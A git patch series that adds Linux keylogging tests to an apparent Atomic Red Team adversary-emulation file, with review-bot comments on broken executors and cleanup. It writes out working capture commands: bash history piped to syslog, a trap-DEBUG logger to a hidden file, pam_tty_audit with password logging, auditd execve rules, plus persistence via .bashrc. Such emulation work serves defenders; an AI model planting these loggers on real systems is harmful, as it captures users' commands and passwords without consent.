From 2947b8d3da3bdbfba046b4753a3d7e9ac2800149 Mon Sep 17 00:00:00 2001 From: biot Date: Tue, 20 Jul 2021 23:46:53 +0100 Subject: [PATCH 1/5] T1056.001 --- atomics/T1056.001/T1056.001.yaml | 128 ++++++++++++++++++++++++++++++- 1 file changed, 126 insertions(+), 2 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index a09fdc50..51e5a88b 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -1,8 +1,8 @@ attack_technique: T1056.001 display_name: 'Input Capture: Keylogging' atomic_tests: + - name: Input Capture - auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 description: | Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) @@ -24,8 +24,8 @@ atomic_tests: Remove-Item $env:TEMP\key.log -ErrorAction Ignore name: powershell elevation_required: true + - name: Living off the land Terminal Input Capture on Linux with pam.d - auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b description: | Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. 
@@ -54,3 +54,127 @@ atomic_tests: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true + +- name: Logging bash history to syslog + description: | + There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. + + To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell and that logger and tee are installed. + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" + executor: + name: sh + elevation_required: ture + command: | + PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' + echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" + tail /var/log/syslog + cleanup_command: | + unset PROMPT_COMMAND + +- name: Bash session based keylogger + description: | + When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. 
trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. + + To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + get_prereq_command: | + echo "" + input_arguments: + output_file: + name: output_file + description: File to store captured commands + type: String + default: /tmp/.keyboard.log + executor: + name: command_prompt + elevation_required: false + command: | + trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG + echo "Hello World!" + cat #{output_file} + cleanup_command: | + rm #{output_file} + +- name: SSHD PAM keylogger + description: | + Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! 
-x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" + input_arguments: + output_file: + name: user_account + description: Basic ssh user account for testing + type: account + default: user_account + executor: + name: command_prompt + elevation_required: true + command: | + cp -v /etc/pam.d/sshd /tmp/ + echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" + systemctl restart sshd + systemctl restart auditd + ssh #{user_account}@localhost + whoami + sudo su + whoami + exit + exit + cleanup_command: | + cp -fv /tmp/sshd /etc/pam.d/ + +- name: Auditd keylogger + description: | + The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" + input_arguments: + output_file: + description: description + type: type + default: default + executor: + name: command_prompt + elevation_required: true + command: | + auditctl -a always,exit -F arch=b64 -S execve -k CMDS + auditctl -a always,exit -F arch=b32 -S execve -k CMDS + whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") + cleanup_command: | + systemctl restart auditd + From 244536527b470be57df2a67414e34db99cf0de66 Mon Sep 17 00:00:00 2001 From: biot Date: Wed, 21 Jul 2021 17:40:24 +0100 Subject: [PATCH 2/5] fix typo --- atomics/T1056.001/T1056.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 51e5a88b..a11de2d9 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml 
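Review bot: `Bash session based keylogger`, `SSHD PAM keylogger` and `Auditd keylogger` all declare `executor: name: command_prompt`, the Windows cmd.exe executor, although `supported_platforms` is `linux` and the commands are shell; because `trap … DEBUG` and the `>(…)` process substitution in the syslog test are bash-only, `name: bash` is the executor that actually runs these. In `SSHD PAM keylogger`, `echo >> "session required pam_tty_audit.so …"` writes an empty line into a file named after the directive instead of appending the directive to the copied `/etc/pam.d/sshd`, so the PAM configuration is never changed, and the `ssh … localhost` / `whoami` / `sudo su` / `exit` lines that follow are typed as if into an interactive session the command executor cannot drive. The `input_arguments: output_file:` block in `Auditd keylogger` is an unfilled template (`description: description`, `type: type`, `default: default`) and should be dropped, and that test's cleanup only restarts auditd, leaving the two `-k CMDS` execve rules loaded — remove them with `auditctl -d always,exit -F arch=b64 -S execve -k CMDS` (and the `b32` twin) rather than `auditctl -D`, which would also wipe rules the host already had. The `prereq_command` blocks test `$SHELL`, which is the login shell rather than the interpreter running the check, and use `echo -e` under `dependency_executor_name: sh`, where dash prints the `-e` literally.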
@@ -74,7 +74,7 @@ atomic_tests: echo "" executor: name: sh - elevation_required: ture + elevation_required: true command: | PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" From a8288151dba4c379243c2dddcfda54d6e0444276 Mon Sep 17 00:00:00 2001 From: biot Date: Wed, 21 Jul 2021 17:46:15 +0100 Subject: [PATCH 3/5] removed blank lines --- atomics/T1056.001/T1056.001.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index a11de2d9..ef842974 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -1,7 +1,6 @@ attack_technique: T1056.001 display_name: 'Input Capture: Keylogging' atomic_tests: - - name: Input Capture description: | Utilize PowerShell and external resource to capture keystrokes @@ -24,7 +23,6 @@ atomic_tests: Remove-Item $env:TEMP\key.log -ErrorAction Ignore name: powershell elevation_required: true - - name: Living off the land Terminal Input Capture on Linux with pam.d description: | Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. @@ -54,7 +52,6 @@ atomic_tests: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true - - name: Logging bash history to syslog description: | There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. 
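Review bot: The spelling fix is correct, but the `executor` this key belongs to is `name: sh`, and `PROMPT_COMMAND` is only evaluated by an interactive bash before it prints a prompt, so under a non-interactive `sh -c` run nothing is ever sent to syslog and the `echo` / `tail /var/log/syslog` lines only display the assignment. The `>(…)` process substitution in that assignment is also a bashism that dash rejects outright. Changing the executor to `name: bash` and running the `history -a …` step once after the assignment would make the test observable; `/var/log/syslog` is additionally Debian-specific, so the check should fall back to the journal or `/var/log/messages` where that file does not exist. The enclosing test starts and ends outside the hunk.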
@@ -81,7 +78,6 @@ atomic_tests: tail /var/log/syslog cleanup_command: | unset PROMPT_COMMAND - - name: Bash session based keylogger description: | When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. @@ -112,7 +108,6 @@ atomic_tests: cat #{output_file} cleanup_command: | rm #{output_file} - - name: SSHD PAM keylogger description: | Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. @@ -149,7 +144,6 @@ atomic_tests: exit cleanup_command: | cp -fv /tmp/sshd /etc/pam.d/ - - name: Auditd keylogger description: | The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. @@ -177,4 +171,3 @@ atomic_tests: whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") cleanup_command: | systemctl restart auditd - From 61e63128beeba435fff48fabc2c2d774cdcd452e Mon Sep 17 00:00:00 2001 From: biot Date: Thu, 22 Jul 2021 14:35:54 +0100 Subject: [PATCH 4/5] fixed user_account --- atomics/T1056.001/T1056.001.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index ef842974..6085dc85 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml 
@@ -123,11 +123,10 @@ atomic_tests: get_prereq_command: | echo "" input_arguments: - output_file: - name: user_account - description: Basic ssh user account for testing - type: account - default: user_account + user_account: + description: Basic ssh user account for testing. + type: string + default: ubuntu executor: name: command_prompt elevation_required: true From 9372e962e7cb566c7e91053699c39b96829f241d Mon Sep 17 00:00:00 2001 From: biot Date: Wed, 28 Jul 2021 12:42:14 +0100 Subject: [PATCH 5/5] added guid's back in --- atomics/T1056.001/T1056.001.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 6085dc85..8c202651 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -2,6 +2,7 @@ attack_technique: T1056.001 display_name: 'Input Capture: Keylogging' atomic_tests: - name: Input Capture + auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 description: | Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) @@ -24,6 +25,7 @@ atomic_tests: name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d + auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b description: | Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.
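Review bot: `type: string` on the renamed `user_account` argument is inconsistent with `type: String` used by the `output_file` argument of `Bash session based keylogger` earlier in this file; the framework's argument types are capitalized, so this line should read `type: String`. `default: ubuntu` assumes a distribution-specific account exists; the prerequisite block should verify the account before the executor relies on it. The executor that consumes `#{user_account}` lies outside the hunk, and its `ssh #{user_account}@localhost` followed by `whoami` / `sudo su` / `exit` is written as an interactive transcript that the command executor will not feed to ssh, so the argument currently has no observable effect.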
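Review bot: Only the two pre-existing tests get their `auto_generated_guid` restored here and in the second hunk (`@@ -24,6 +25,7 @@`); the four tests added in PATCH 1/5 (`Logging bash history to syslog`, `Bash session based keylogger`, `SSHD PAM keylogger`, `Auditd keylogger`) still have none, so they cannot be selected by GUID like the rest of the file. Each of them needs its own `auto_generated_guid: <new-uuid>` line directly under `- name:`, in the same position used in these two hunks.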